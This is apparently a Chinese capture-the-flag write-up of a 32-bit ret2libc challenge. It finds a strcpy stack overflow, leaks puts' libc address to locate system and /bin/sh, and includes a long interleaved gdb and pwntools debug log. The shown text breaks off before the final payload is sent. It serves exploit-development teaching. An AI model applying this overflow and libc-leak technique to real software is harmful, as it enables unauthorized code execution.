1.题目信息
题目下载链接:https://pan.baidu.com/s/1wk3JFQBHgVZ0vjfnQk60Ug 提取码:0000
2.解题分析
相对于前面两道例题难度加大了不少,程序中既没有system函数的地址,也没有/bin/sh字符串,我们需要使用libc中的system函数和/bin/sh,题目已经将libc版本给了出来,这时需要泄露libc某个函数的地址。实际上大部分题都需要我们自己获得system函数的地址,通常是通过libc的延迟绑定机制,泄露出已经执行过的函数的地址,而libc中的函数之间的相对偏移是固定的,有时候还需要返回到main函数或其他函数多次构造payload进行利用。
2.1 首先查看一下程序开了哪些安全保护
root@pwn_test1604:/ctf/work/wolf/ret2libc# checksec ret2libc3
[*] '/ctf/work/wolf/ret2libc/ret2libc3'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
root@pwn_test1604:/ctf/work/wolf/ret2libc#
程序是小端序32位,开了NX防护。
2.2 接着使用ida查看一下程序
2.3 主函数中并没有产生溢出,但有两个可以的函数,跟进去看看
Print_message函数的字符串拷贝存在栈溢出,又main函数可知src字符串长度最多可达256,远超过56。由于在libc中各函数地址的偏移是固定的,通过泄露出某个函数的真实地址,再减去该函数在libc中的地址就能得到libc函数中加载到内存的基址,这样就能计算出system函数和/bin/sh的地址。
2.4 通过gdb调试确定字符串s的地址离ebp有多少字节
动态调试
在跟入到print_message函数中,经过strcpy后观察栈帧的情况,此时eax的地址在0xffffcfe0,ebp的地址为0xffffd018
set $_base = 0x8048000 [0/178]│Starting program: /ctf/work/wolf/ret2libc/ret2libc3
[*] running in new terminal: /usr/bin/gdb -q "./ret2libc3" 937 -x "/tmp/pwn30PHCO.gdb" │###############################
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'sp', '-h', '/usr/bin/gdb -q "./ret2libc3" 937 -x "/│Do you know return to library ?
tmp/pwn30PHCO.gdb"'] │###############################
[+] Waiting for debugger: Done │What do you want to see in memory?
[DEBUG] PLT 0x80483b0 read │Give me an address (in dec) :134520860
[DEBUG] PLT 0x80483c0 printf │The content of the address : 0xf7e72ca0
[DEBUG] PLT 0x80483d0 fflush │Leave some message for me :0xf7d9fca0
[DEBUG] PLT 0x80483e0 strcpy │
[DEBUG] PLT 0x80483f0 puts │Breakpoint 1, 0x08048556 in Print_message ()
[DEBUG] PLT 0x8048400 __gmon_start__ │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
[DEBUG] PLT 0x8048410 __libc_start_main │──────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────
[DEBUG] PLT 0x8048420 strtol │ EAX 0xffffd5a2 ◂— 0x37667830 ('0xf7')
[DEBUG] PLT 0x176b0 _Unwind_Find_FDE │ EBX 0x0
[DEBUG] PLT 0x176c0 realloc │ ECX 0xffffd5a2 ◂— 0x37667830 ('0xf7')
[DEBUG] PLT 0x176e0 memalign │ EDX 0x100
[DEBUG] PLT 0x17710 _dl_find_dso_for_object │ EDI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
[DEBUG] PLT 0x17720 calloc │ ESI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
[DEBUG] PLT 0x17730 ___tls_get_addr │ EBP 0xffffd588 —▸ 0xffffd6b8 ◂— 0x0
[DEBUG] PLT 0x17740 malloc │ ESP 0xffffd540 —▸ 0xf7fc5d60 (_IO_2_1_stdout_) ◂— 0xfbad2a84
[DEBUG] PLT 0x17748 free │ EIP 0x8048556 (Print_message+6) ◂— mov eax, dword ptr [ebp + 8]
[*] '/lib/i386-linux-gnu/libc.so.6' │───────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────
Arch: i386-32-little │ ► 0x8048556 <Print_message+6> mov eax, dword ptr [ebp + 8]
RELRO: Partial RELRO │ 0x8048559 <Print_message+9> mov dword ptr [esp + 4], eax
Stack: Canary found │ 0x804855d <Print_message+13> lea eax, [ebp - 0x38]
NX: NX enabled │ 0x8048560 <Print_message+16> mov dword ptr [esp], eax
PIE: PIE enabled │ 0x8048563 <Print_message+19> call strcpy@plt <0x80483e0>
[DEBUG] Received 0xa0 bytes: │
'###############################\n' │ 0x8048568 <Print_message+24> lea eax, [ebp - 0x38]
'Do you know return to library ?\n' │ 0x804856b <Print_message+27> mov dword ptr [esp + 4], eax
'###############################\n' │ 0x804856f <Print_message+31> mov dword ptr [esp], 0x8048721
'What do you want to see in memory?\n' │ 0x8048576 <Print_message+38> call printf@plt <0x80483c0>
'Give me an address (in dec) :' │
[DEBUG] Sent 0xa bytes: │ 0x804857b <Print_message+43> leave
'134520860\n' │ 0x804857c <Print_message+44> ret
[DEBUG] Received 0x28 bytes: │────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────
'The content of the address : 0xf7d9fca0\n' │00:0000│ esp 0xffffd540 —▸ 0xf7fc5d60 (_IO_2_1_stdout_) ◂— 0xfbad2a84
[*] puts_addr: 0xf7d9fca0 │01:0004│ 0xffffd544 —▸ 0x804b008 ◂— 'Leave some message for me :: 0xf7e72ca0\n'
[DEBUG] Received 0x1b bytes: │02:0008│ 0xffffd548 ◂— 0x1b
'Leave some message for me :' │03:000c│ 0xffffd54c ◂— 0x0
[DEBUG] Sent 0x49 bytes: